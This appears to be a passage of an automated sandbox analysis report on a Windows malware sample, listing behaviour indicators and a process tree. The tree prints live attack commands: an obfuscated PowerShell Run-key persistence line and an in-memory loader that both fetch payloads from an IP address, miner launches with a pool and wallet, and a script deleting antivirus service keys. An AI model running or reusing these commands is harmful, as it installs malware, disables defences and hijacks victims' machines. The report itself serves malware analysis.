6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e fsucenter.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
C4FF50648C4FB9E60E0F0C30A41BBA2C.exepid process 2388 C4FF50648C4FB9E60E0F0C30A41BBA2C.exe 2388 C4FF50648C4FB9E60E0F0C30A41BBA2C.exe 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3064 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
C4FF50648C4FB9E60E0F0C30A41BBA2C.exepid process 2388 C4FF50648C4FB9E60E0F0C30A41BBA2C.exe 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 3064 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
85C1.exe949A.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeDebugPrivilege 4036 85C1.exe Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeDebugPrivilege 2004 949A.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 2528 powershell.exe Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 Token: SeShutdownPrivilege 3064 Token: SeCreatePagefilePrivilege 3064 -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
7B11.tmppid process 812 7B11.tmp -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3064 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
C4FF50648C4FB9E60E0F0C30A41BBA2C.exe7B11.exe7B11.tmp7B11.exe7B11.tmp8A56.exeRuntimebroker.exedescription pid process target process PID 4020 wrote to memory of 2388 4020 C4FF50648C4FB9E60E0F0C30A41BBA2C.exe C4FF50648C4FB9E60E0F0C30A41BBA2C.exe PID 4020 wrote to memory of 2388 4020 C4FF50648C4FB9E60E0F0C30A41BBA2C.exe C4FF50648C4FB9E60E0F0C30A41BBA2C.exe PID 4020 wrote to memory of 2388 4020 C4FF50648C4FB9E60E0F0C30A41BBA2C.exe C4FF50648C4FB9E60E0F0C30A41BBA2C.exe PID 4020 wrote to memory of 2388 4020 C4FF50648C4FB9E60E0F0C30A41BBA2C.exe C4FF50648C4FB9E60E0F0C30A41BBA2C.exe PID 4020 wrote to memory of 2388 4020 C4FF50648C4FB9E60E0F0C30A41BBA2C.exe C4FF50648C4FB9E60E0F0C30A41BBA2C.exe PID 4020 wrote to memory of 2388 4020 C4FF50648C4FB9E60E0F0C30A41BBA2C.exe C4FF50648C4FB9E60E0F0C30A41BBA2C.exe PID 3064 wrote to memory of 1152 3064 7B11.exe PID 3064 wrote to memory of 1152 3064 7B11.exe PID 3064 wrote to memory of 1152 3064 7B11.exe PID 1152 wrote to memory of 3784 1152 7B11.exe 7B11.tmp PID 1152 wrote to memory of 3784 1152 7B11.exe 7B11.tmp PID 1152 wrote to memory of 3784 1152 7B11.exe 7B11.tmp PID 3784 wrote to memory of 2112 3784 7B11.tmp 7B11.exe PID 3784 wrote to memory of 2112 3784 7B11.tmp 7B11.exe PID 3784 wrote to memory of 2112 3784 7B11.tmp 7B11.exe PID 2112 wrote to memory of 812 2112 7B11.exe 7B11.tmp PID 2112 wrote to memory of 812 2112 7B11.exe 7B11.tmp PID 2112 wrote to memory of 812 2112 7B11.exe 7B11.tmp PID 3064 wrote to memory of 4036 3064 85C1.exe PID 3064 wrote to memory of 4036 3064 85C1.exe PID 3064 wrote to memory of 4036 3064 85C1.exe PID 3064 wrote to memory of 3916 3064 8A56.exe PID 3064 wrote to memory of 3916 3064 8A56.exe PID 3064 wrote to memory of 3916 3064 8A56.exe PID 812 wrote to memory of 832 812 7B11.tmp fsucenter.exe PID 812 wrote to memory of 832 812 7B11.tmp fsucenter.exe PID 812 wrote to memory of 832 812 7B11.tmp fsucenter.exe PID 3064 wrote to memory of 2684 3064 8D54.exe PID 3064 wrote to memory of 2684 3064 8D54.exe PID 3064 wrote to memory of 2684 3064 8D54.exe PID 3064 wrote to memory of 1192 3064 90B1.exe PID 3064 wrote to memory of 1192 3064 90B1.exe PID 3064 wrote to memory of 1192 3064 90B1.exe PID 3916 wrote to memory of 3256 3916 8A56.exe Runtimebroker.exe PID 3916 wrote to memory of 3256 3916 8A56.exe Runtimebroker.exe PID 3916 wrote to memory of 3256 3916 8A56.exe Runtimebroker.exe PID 3064 wrote to memory of 2004 3064 949A.exe PID 3064 wrote to memory of 2004 3064 949A.exe PID 3064 wrote to memory of 2004 3064 949A.exe PID 3064 wrote to memory of 2248 3064 explorer.exe PID 3064 wrote to memory of 2248 3064 explorer.exe PID 3064 wrote to memory of 2248 3064 explorer.exe PID 3064 wrote to memory of 2248 3064 explorer.exe PID 3064 wrote to memory of 3748 3064 explorer.exe PID 3064 wrote to memory of 3748 3064 explorer.exe PID 3064 wrote to memory of 3748 3064 explorer.exe PID 3256 wrote to memory of 2028 3256 Runtimebroker.exe powershell.exe PID 3256 wrote to memory of 2028 3256 Runtimebroker.exe powershell.exe PID 3256 wrote to memory of 2028 3256 Runtimebroker.exe powershell.exe PID 3064 wrote to memory of 3996 3064 explorer.exe PID 3064 wrote to memory of 3996 3064 explorer.exe PID 3064 wrote to memory of 3996 3064 explorer.exe PID 3064 wrote to memory of 3996 3064 explorer.exe PID 3064 wrote to memory of 1596 3064 explorer.exe PID 3064 wrote to memory of 1596 3064 explorer.exe PID 3064 wrote to memory of 1596 3064 explorer.exe PID 3064 wrote to memory of 1672 3064 explorer.exe PID 3064 wrote to memory of 1672 3064 explorer.exe PID 3064 wrote to memory of 1672 3064 explorer.exe PID 3064 wrote to memory of 1672 3064 explorer.exe PID 3064 wrote to memory of 3848 3064 explorer.exe PID 3064 wrote to memory of 3848 3064 explorer.exe PID 3064 wrote to memory of 3848 3064 explorer.exe PID 3064 wrote to memory of 3704 3064 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\C4FF50648C4FB9E60E0F0C30A41BBA2C.exe"C:\Users\Admin\AppData\Local\Temp\C4FF50648C4FB9E60E0F0C30A41BBA2C.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4FF50648C4FB9E60E0F0C30A41BBA2C.exe"C:\Users\Admin\AppData\Local\Temp\C4FF50648C4FB9E60E0F0C30A41BBA2C.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7B11.exeC:\Users\Admin\AppData\Local\Temp\7B11.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-O66OP.tmp\7B11.tmp"C:\Users\Admin\AppData\Local\Temp\is-O66OP.tmp\7B11.tmp" /SL5="$40178,4193427,831488,C:\Users\Admin\AppData\Local\Temp\7B11.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7B11.exe"C:\Users\Admin\AppData\Local\Temp\7B11.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-FP1NT.tmp\7B11.tmp"C:\Users\Admin\AppData\Local\Temp\is-FP1NT.tmp\7B11.tmp" /SL5="$50178,4193427,831488,C:\Users\Admin\AppData\Local\Temp\7B11.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\7-Zip\Lang\sihost.exe"C:\Program Files\7-Zip\Lang\sihost.exe"8⤵
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exeNULL6⤵
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\85C1.exeC:\Users\Admin\AppData\Local\Temp\85C1.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\8A56.exeC:\Users\Admin\AppData\Local\Temp\8A56.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete 